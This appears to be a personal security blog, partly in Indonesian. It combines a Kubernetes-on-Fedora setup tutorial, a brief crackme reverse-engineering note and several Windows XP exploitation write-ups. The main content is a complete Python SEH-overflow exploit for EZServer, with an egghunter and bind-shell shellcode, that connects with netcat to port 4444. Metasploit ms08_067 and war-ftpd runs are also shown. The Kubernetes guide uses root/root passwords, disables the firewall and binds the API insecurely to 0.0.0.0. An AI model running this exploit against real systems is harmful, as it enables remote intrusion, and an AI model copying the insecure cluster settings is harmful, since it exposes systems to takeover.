Tutorial Install Kubernetes di Windows
Tutorial Kubernetes untuk Windows
Pada tutorial dokumentasi dari situs kubernetes disampaikan jika ingin mencoba kubernetes harus menggunakan sistem operasi Linux atau Mac OS, maka kita akan mencoba menginstall Linux Fedora di Virtual-Box manual dan tanpa menggunakan Vagrant untuk windows.
Pengaturan VM
- Download Virtual-Box
Download virtual-box versi 4.3.28 => http://download.virtualbox.org/virtualbox/4.3.28/VirtualBox-4.3.28-100309-Win.exe
Instalasi seperti biasa.
2. Download & Install Fedora OS Image di Vitual-Box
Buat dua Virtual machine dengan nama “fed-master” dan “fed-node”.
Ikutin tutorial ini untuk install fedora >> http://linuxpitstop.com/install-fedora-22-workstation-on-virtualbox/
Tapi pada saat disuruh download image nya download yang versi server-21 disini >>
http://mirror.wanxp.id/fedora/linux/releases/21/Server/x86_64/iso/Fedora-Server-DVD-x86_64-21.iso (1,9GB)
Kalau disuruh kasih password root = root.
Setelah install matikan saja VMnya kemudian masuk ke setting, ke bagian network tambah adapter baru Host-Only.
Jangan lupa disknya dihilangkan centangnya sebelum menyalakan VM.
Instalasi & Setting Kubernetes
Setelah selesai menginstall 2 VM kita akan mengikuti dokumentasi dari http://kubernetes.io/v1.1/docs/getting-started-guides/fedora/fedora_manual_config.html
SETTING FED-MASTER & FED-NODE
Setelah sudah nyala akan diminta user login masukan root dan password juga root. Kemudian ketik kode dalam kotak dibawah. Tunggu sampai selesai download.
yum -y install kubernetes docker-io
|
Tambahan untuk fed-master
yum -y install etcd iptables
|
- Setting ip address untuk fed-master 192.168.121.9 dan untuk fed-node 192.168.121.65.
ip addr add 192.168.121.9/24 dev enp0s8
ip link set enp0s8 up |
- Simpan ip ke file /etc/hosts
echo "192.168.121.9 fed-master
192.168.121.65 fed-node" >> /etc/hosts |
- Mengedit file /etc/kubernetes/config
Sekarang untuk mengedit file tersebut kita akan menggunakan aplikasi nano. Sekarang buka file diatas :
nano /etc/kubernetes/config
|
Setelah terbuka cari bagian “KUBE_MASTER” dan ubah dari http://127.0.0.1:8080 menjadi http://fed-master:8080.
Setelah di edit pencet “Ctrl+x” dan tekan “y” dan enter untuk menyimpan file.
Edit file ini di VM master dan node.
- Mematikan firewall
Ketik perintah dibawah untuk mematikan firewall agar tidak mengganggu koneksi kubernetes.
systemctl disable iptables-services firewalldsystemctl stop iptables-services firewalld
|
SETTING UNTTUK FED-MASTER
Setting-setting dibawah ini dilakukan pada VM fed-master.
- Edit /etc/kubernetes/apiserver
Edit dengan nano seperti contoh cara diatas. Ubah line seperti dibawah ini.
# The address on the local server to listen to.
KUBE_API_ADDRESS="--insecure-bind-address=0.0.0.0" |
- Edit /etc/etcd/etcd.conf
Sama caranya seperti diatas, ubah yang ada localhost menjadi 0.0.0.0
ETCD_LISTEN_CLIENT_URLS="http://0.0.0.0:2379"
|
- Buat folder /var/run/kubernetes
mkdir /var/run/kuberneteschown kube:kube /var/run/kuberneteschmod 750 /var/run/kubernetes
|
Kalau ada error berkas telah ada, maka lewati langkah ini.
- Jalankan service kubernetes
for SERVICES in etcd kube-apiserver kube-controller-manager kube-scheduler; do
systemctl restart $SERVICES systemctl enable $SERVICES systemctl status $SERVICES done |
Jika telah benar mengetik akan ada tampilan active (running) berarti sudah sukses.
- Tambah node ke fed-master
Kita akan membuat file node.json yang berisi informasi mengenai node yang akan digunakan oleh kubernetes.
Jalankan perintah ‘nano ~/node.json’. Kemudian ketikan isi file seperti berikut :
{
"apiVersion": "v1", "kind": "Node", "metadata": { "name": "fed-node", "labels":{ "name": "fed-node-label"} }, "spec": { "externalID": "fed-node" } } |
- Buat objek nodenya
kubectl create -f ~/node.json
|
SETTING UNTUK FED-NODE
Setting-setting dibawah ini dilakukan pada VM fed-node.
- Edit /etc/kubernetes/kubelet
###
# Kubernetes kubelet (node) config # The address for the info server to serve on (set to 0.0.0.0 or "" for all interfaces) KUBELET_ADDRESS="--address=0.0.0.0" # You may leave this blank to use the actual hostname KUBELET_HOSTNAME="--hostname-override=fed-node" # location of the api-server KUBELET_API_SERVER="--api-servers=http://fed-master:8080" |
- Jalankan service pada fed-node
for SERVICES in kube-proxy kubelet docker; do
systemctl restart $SERVICES systemctl enable $SERVICES systemctl status $SERVICES done |
Jika sukses akan active ketiga service tersebut.
Terakhir test status node dari fed-master
kubectl get nodes
|
Kalau status sudah ‘Ready’ artinya sudah sukses konek dari master ke node.
Menjalankan Image Docker di cluster.
- Generate key
openssl genrsa -out /tmp/serviceaccount.key 2048
|
2. Edit file /etc/kubernetes/apiserver dan ubah :
KUBE_API_ARGS="--service_account_key_file=/tmp/serviceaccount.key"
|
3. Edit file /etc/kubernetes/controller-manager dan ubah:
KUBE_CONTROLLER_MANAGER_ARGS="--service_account_private_key_file=/tmp/serviceaccount.key"
|
4. Restart service
systemctl restart kube-controller-manager.service
|
Run Image.
kubectl run nginx --image=nginx --replicas=2 --port=9000
|
--Selesai--
Learning RE with HAWKE
In this post i will tell a simple reverse engineering with app called HAWKE.
Which you can download from here.
Which you can download from here.
- Sandwich.app
This simple objective-c application ask for simple serial code. After diassembly i found the validate class. The pseudocode for this class is below :
The important part is :
LOBYTE(eax) = 0x19c5 - (SAR(sum, 0x2)) == index3 ? 0x1 : 0x0;SAR is shift aritmetic right. It means the index3 must be equal to sum after shift right. Which i can write simple python code for it.
- Unicorn.app
- Fox.app
- Socks.app
Software Exploitation : Ezserver Using Egghunter
Exploit : Ezserver using Egghunter
Last post I have told you the way to
exploit ezserver to open calculator app. It was a great POC. But there
is a problem, because we can't send our payload to esp register. The
register is to small for our shellcode but the buffer is huge space. The
technique now is to use egghunter. Egghunter is a piece of code that
basically search for our shellcode anywhere in the memory. It
searches for the “keyword” then execute code after the keyword is
found.
In this post I will use egghunter code
from skape and from this
website.
So here is our plan
for fuzzer
[+] How its work
- The previously our buffer with "A"s, now we will fill it with our shellcode and adjust it to keep it fit with eip offset.
5884 - 100 - 352 = 5432 bytes
- Our shellcode append with "w00tw00t"
8 + 344 = 352 bytes
- Egghunter code
[+] Try the hunter
- Next is try to see if the egghunter code is working by using \xCC to stop the execution of our application in debugger.
- Open ollydebugger, attach it to ezserver application.
- Run script below with our \xcc and adjusted alignment.
awalan="\x90" * (5784 - 12) cece=("w00tw00t" +"\xcc\xcc\xcc\xcc") buffer = "\x90" * 100 offset="\xeb\x06\x90\x90" popret="\x96\x96\x20\x10" nopsled="\x90" * 2 egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") akhiran="\x90" * (250 - len(egghunt)) LHOST="192.168.56.101" LPORT=8000 print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT) sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((LHOST,LPORT)) sock.send( awalan+ cece + buffer + offset + popret + nopsled + egghunt + akhiran ) print ("[+] Buffer send success..\n") sock.close()
- Pass the exeption in olly and wait few seconds then it hit our cc.
- By this means our egghunter code is running and it successfully find our code in this case four "\xCC".
[+] Connecting
- The running script.
- Win.
[+] Connecting
- By far our code is running okey, now we will use windows bind shell as our payload, in port 4444.
- Here is my final code.
#!/usr/bin/python
import socket, sys, os
from time import sleep
print "\n ================================= "
print " > EZServer SEH Overflow <"
print " > Written by aldo <"
print " > i-s-2-c <"
print " =================================\n"
awalan="\x90" * (5784 - 352) #len(payload)
payload=("w00tw00t" +
"\xdb\xd3\xba\xd2\x1b\x8d\xdf\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5f"
"\x31\x57\x17\x03\x57\x17\x83\x3d\xe7\x6f\x2a\x3d\x72\x9b\x98\x55"
"\x7a\xa4\xdc\x5a\x1d\xd0\x4f\x80\xfa\x6d\xca\xf4\x89\x0e\xd0\x7c"
"\x8f\x01\x51\x33\x97\x56\x39\xeb\xa6\x83\x8f\x60\x9c\xd8\x11\x98"
"\xec\x1e\x88\xc8\x8b\x5f\xdf\x17\x55\x95\x2d\x16\x97\xc1\xda\x23"
"\x43\x32\x0b\x26\x8e\xb1\x14\xec\x51\x2d\xcc\x67\x5d\xfa\x9a\x28"
"\x42\xfd\x77\xd5\x56\x76\x0e\xb5\x82\x94\x70\x86\xfa\x7f\x16\x83"
"\xbe\x4f\x5c\xd3\x4c\x3b\x12\xcf\xe1\xb0\x93\xe7\xa7\xae\x9d\xb9"
"\x59\xc3\xf2\xba\xb0\x7d\xa0\x22\x55\xb1\x74\xc2\xd2\xc6\x4a\x4d"
"\x49\xd6\x7b\x19\xba\xc5\x80\xe2\x6c\xe9\xaf\x4b\x04\xf0\x36\xf2"
"\xfb\xf3\xb4\xa1\x69\x06\x46\x99\x06\xdf\xb1\xec\x7a\x88\x3e\xd8"
"\xd6\x64\x92\xb7\x8b\xc9\x47\x74\x7f\x31\xb7\x1c\x17\xdc\x64\x86"
"\xb4\x57\x75\xd3\x53\xcc\x6c\xab\x64\x5b\x6e\x9d\x01\x74\xc1\x74"
"\x29\xa4\x89\xd2\x78\x6b\xa3\x4d\x7c\xa2\x60\x24\x7d\x9b\xef\x23"
"\xc8\x9a\xb9\xfc\x34\x74\x69\x56\x9f\x2c\x75\x86\x8c\xa7\x6e\x5f"
"\x75\x4e\x26\x60\xaf\xe4\x37\x4e\x36\x6d\xac\x08\xdf\x12\x41\x5d"
"\xfa\xbf\xc9\x04\x2c\x8c\x63\x51\x44\x48\xfd\x7f\xa8\x90\x0e\xd5"
"\x35\x52\xdc\xd7\x88\x7f\x8d\xaa\x77\xb8\x1a\x1f\x2c\xd0\x2e\xa1"
"\x80\x37\x30\x28\xa3\xc8\x18\x89\x7c\x65\xf4\x7c\xd2\xe3\xf7\x2f"
"\x85\xa6\xa6\x30\xf5\x21\xe4\x17\xf3\x7f\xa5\x58\x2a\x15\xb5\x59"
"\xe4\x15\x99\x2e\x5c\x16\x99\xf4\x07\x19\x48\xa6\x38\x35\x1d\x38"
"\x1f\x54\xad\x97\x60\x4f\xad\xc7") # size 344 + 8 = 352
buffer = "\x90" * 100 #align the stack (kurang awalan 5884 | 100)
offset="\xeb\x06\x90\x90" #jmp 6 byte
popret="\x96\x96\x20\x10" #posisi seh -> eip
nopsled="\x90" * 2
egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
+"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") #32 byte egghunter
akhiran="\x90" * (250 - len(egghunt))
LHOST="192.168.56.101"
LPORT=8000
print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT)
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((LHOST,LPORT))
sock.send(awalan+ payload + buffer + offset + popret + nopsled + egghunt + akhiran )
print ("[+] Buffer send success..\n")
sock.close()
print "[+] Wait for hatch (0)..\n"
sleep(5)
print "[+] Connecting...\n"
sleep(9)
os.system("nc -n %s 4444" %LHOST)
except:
print "[-] Could not connect to %s on port %d\n" % (LHOST,LPORT)
sys.exit(0)
- Run Ezserver application.
- The running script.
- Win.
Software Exploitation : Ezserver
Today we will going to exploit an application name Ezserver.
Ezhometech Eserver is a simple http server, that serve a requested web page from client.
We will using Windows XP SP3 English in VirtualBox.
[*] Information gathering
- The app is using port 8000 and here when using nmap :
[*] Fuzzing
- Create simple fuzzer for request to ezserver.
We will using Windows XP SP3 English in VirtualBox.
[*] Information gathering
- The app is using port 8000 and here when using nmap :
8000/tcp open http-alt- Web using html with heavy javascript.
[*] Fuzzing
- Create simple fuzzer for request to ezserver.
- Send "A" buffer, first try for 1000 but the ezserver is still up, second try times ten to 10.000 A's and ezserver is crash. Oke next step.
[*] Debug
- Now we eill try to find out what happened to ezserver when it crash. In this step i will use Immunity debugger. First open Immunity and attach to ezserver.
-Don't forget to run it, next we will try to send our fuzzer again.
- The register ESP ESI EDI is filled with our A's. The immunity is requesting to pass the exeption to the application.
- And our EIP an SEH Chain is also hit by "\x41".
- Now that we know we can hit EIP we can try to find EIP offset using pattern with pattern_create 10000 and send it using our fuzzer.
- Now the value is 336f4832 and using pattern_offset and we find our offset "5888".
- Next we will confirm it with deadbeef.
- The SEH chain is now DEADBEEF. Next is try to bypass SEH using command POP POP RETN.
- We search in ezserver own dll, MSVCRTD.dll and the address is 10209696 = "\x96\x96\x20\x10"
- We just toogle the breakpoint to see if the address is pointed.
After we toogle the breakpoint now we
will try to run the fuzzer.
The eip is sucessfully go to our
intended addres for POP POP RETN, now we can bypass SEH.
[*] Exploit
- Here are just the diagram I draw to
how how we will try to open “Calculator” app.
- First is the buffer which is 5888
byte long.
- Our buffer is filled with 5884 byte
“A” and our jump short code. Jump short code is \xEB\x06 and 06
is 6 byte. Because i use 32bit register so we add 2 nops = \x90\x90.
- Next our payload, and we use
metasploit payload foe executing command.
- Here is the payload for calc.exe.
- And here are our last fuzzer. Lets
run it.
- And looks like we done it.
- next post we will try to send our
shellcode and using egghunter!
Try to exploit smb and warftp in Win XP
Today task is to exploit smb service and war-ftp in windows xp. First with smb.
Nmap to remote host .
Port 21/tcp open ftp WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
And Samba service is turn on.
Next is warftp,
First is search metasploit and found 2 match, warftpd_165_user and warftpd_165_pass.
Then use warftpd_165_pass and set the remote host ip,
Exploit but no luck, swich to warftpd_165_user.
Exploit and error occur "Exploit failed: A target has not been selected."
Set the target to 3, Windows XP SP3
Run the exploit, but it send me a "connection was refused error" , then i check the virtual box, the warftp is crash from the previous attempt, so rerun and start the ftp daemon.
Rexploit and done we are in again.
Thank you for reading.
Nmap to remote host .
Port 21/tcp open ftp WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
And Samba service is turn on.
Now using metasploit framework. Search for smb.
Using ms07_029_msdns_zonemane which doesn't work with Windows XP apparently.
Switch to use ms08_067_netapi, set the remote ip, and exploit.
And we are in.
Next is warftp,
First is search metasploit and found 2 match, warftpd_165_user and warftpd_165_pass.
Then use warftpd_165_pass and set the remote host ip,
Exploit but no luck, swich to warftpd_165_user.
Exploit and error occur "Exploit failed: A target has not been selected."
A quick googling and the answer is to set the target.
Set the target to 3, Windows XP SP3
Run the exploit, but it send me a "connection was refused error" , then i check the virtual box, the warftp is crash from the previous attempt, so rerun and start the ftp daemon.
Rexploit and done we are in again.
Thank you for reading.
Langganan:
Postingan
(
Atom
)